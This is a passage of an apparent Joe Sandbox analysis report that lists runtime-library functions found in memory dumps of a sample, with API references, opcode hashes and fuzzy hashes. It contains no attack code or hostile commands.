                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040187F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                                                                        • std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                                        • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                                                                        • Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                                                                        • Instruction ID: 07e54f61a89a03d5a6d9a7cf2ef478e5e050e13e4079476904521aa99984b06a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78F0C26290035C63DB10B9659C42FEA7B989F09358F24C03BFD45761E1D77D5A04C6ED
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04201AE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04201B30
                                                                                                                                                                                                                                                                                        • std::system_error::system_error.LIBCPMT ref: 04201B3F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                                        • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                                                                        • Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                                                                        • Instruction ID: 4019645d22e2de1611a6294bf7c3f75aa3ab5cb862133cd6c02f6cb9290f9f3d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32F0C261B2032873EB14AA909841FF97AD89F08394F14C025ED44671D2E7B66A24C2E8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00413A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002), ref: 00413A8C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                        • Opcode ID: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                                                                        • Instruction ID: a34188c843a8f46fdd92a2bf3fbb0ddbd7449eedd0cf1b17e067f3e400b11719
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CF0A930B01218BBDB109F50DC05B9E7F78EF44752F404069F809A2290DF344E45C79C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041AA79 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                                                                        • Instruction ID: 9cd28828fb54a95b18f1d3d04b552151bab261da8883c7926ca586bf812e9daa
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA71B1359022569BCB218B59C884AFFBB75EF41350F14422BE914A7380E7789CE1C7EA
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0421ACE0 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                                                                        • Instruction ID: 591d13821aac671d919a2eeff4b2509e658ac7dfc3a93ff7c603ec3f138e0507
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F471A2B1B322179BDF318F54C884ABFBBF5EF65360F144229E411A72A0D7B1A945C7A0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004145CC Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004146D7
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004146EE
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041470D
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00414728
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041473F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3033488037-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2c06067473a54b0b3c4dcb2ce690be4f72ab32beef6c94a1af6c97b9f8a34214
                                                                                                                                                                                                                                                                                        • Instruction ID: c2206efc5f66e5100cf0e8c7e25606760de7fe79bb98949094d9bf3f90d27d39
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c06067473a54b0b3c4dcb2ce690be4f72ab32beef6c94a1af6c97b9f8a34214
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B51D471A00304AFDB20DF65D881BAA77F4EF99728F15056EE809D7690E739E981CB48
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04214833 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3033488037-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8544e75f2518b62a1a383347014769151c2d842ae9fb572832dcd9a460fabfde
                                                                                                                                                                                                                                                                                        • Instruction ID: 77d57c833036a587c503ea0dabdc9ebe2ec053b6792ebeb5ba4be722604d87eb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8544e75f2518b62a1a383347014769151c2d842ae9fb572832dcd9a460fabfde
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8651A371B20205AFEB20EF69CC81B6A77F4EF69724B14056AE84DDB260E731F901CB44
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00415063 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 81a5185806a9401f4f6bbc1d868cdf71e9ab0390722ec972a11af2b9906213fa
                                                                                                                                                                                                                                                                                        • Instruction ID: dd2835c9885c6aa3f8cce8b3b5d5cac91b3775441f4e2c90be38872ca8706c4a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81a5185806a9401f4f6bbc1d868cdf71e9ab0390722ec972a11af2b9906213fa
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A341D332E00710EFDB15DFA9C880A9AB7B1EF89314B1545AAE515EB382D735AD41CB84
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042152CA Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                                                                        • Instruction ID: 86ab9bb6effe8817ba1905175aa501a3cd5c24198aa1a86aa224d49b6e7ccccf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2141D172B10300AFDB24DF78C880A5EB3F5EF95314B5545A9D516EB2A1EB71B941CB80
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041B429 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00411992,?,00000000,?,00000001,?,?,00000001,00411992,?), ref: 0041B476
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 0041B4AE
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B4FF
                                                                                                                                                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DE7,?), ref: 0041B511
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 0041B51A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 313313983-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
                                                                                                                                                                                                                                                                                        • Instruction ID: e6e93543b041c594e81487d5909f541e573430f1ea5015fd54542e6688d1641d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E931AC32A0021AABDB249F65DC41DEF7BA5EF40318F04412AFC04D6291EB39CD95CB94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041E533 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0041E53C
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E55F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E585
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041E598
                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E5A7
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 161ddad54f16cc8f8ee3f9efc600df624e91a9148f9a42830057588c6c76ba95
                                                                                                                                                                                                                                                                                        • Instruction ID: da1d7805988d3e4f29d48d7d5147bf5fd0936ba562dc79f78d94e6ba61cfb34a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 161ddad54f16cc8f8ee3f9efc600df624e91a9148f9a42830057588c6c76ba95
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4901D8766027207F23211AB75C48DFF6E6EDEC6B98355012EFD08D6200FE688D429178
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0421E79A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0421E7A3
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0421E7C6
                                                                                                                                                                                                                                                                                          • Part of subcall function 04217CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04217CDE
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0421E7EC
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421E7FF
                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0421E80E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
                                                                                                                                                                                                                                                                                        • Instruction ID: 85883ce5fbef40d84fd973d1ce3d309e9e85d3c21b8fbd7e890d6afdf70ee667
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3401B1727226217F333126AA5C8CC7F79ACDAE2AA43170169FD04D2120EE61AC02C1B5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00416D9D Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416DD7
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416DFE
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00416E0B
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00416E14
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e3e90bff77222727508dad1f2841c580120b19f71aaf83784f7f1a74d7e00c24
                                                                                                                                                                                                                                                                                        • Instruction ID: e46c26cc5ac3d344e97fba90109cbcfbfaa945fe7b6790f8bafc9466d81cae3c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3e90bff77222727508dad1f2841c580120b19f71aaf83784f7f1a74d7e00c24
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA01D6367447106A82217676BC85EEB2629DBC5764763027FF515A2282EF2CCC86515C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04217004 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,042125ED,04217307,?,04216FAE,00000001,00000364,?,0420E697,?,?,?,0420ED94,?), ref: 04217009
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421703E
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04217065
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 04217072
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0421707B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                                                                        • Instruction ID: 5b6495fe450919f085fff48d7845ebddf11563e6e3c24d34057f6b9a9d837d15
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A01F9767707016B97322BF56C84F2F32D9EBF12A57210138F512A22B0FE70A8024164
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041EE9E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041EEB6
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041EEC8
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041EEDA
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041EEEC
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041EEFE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
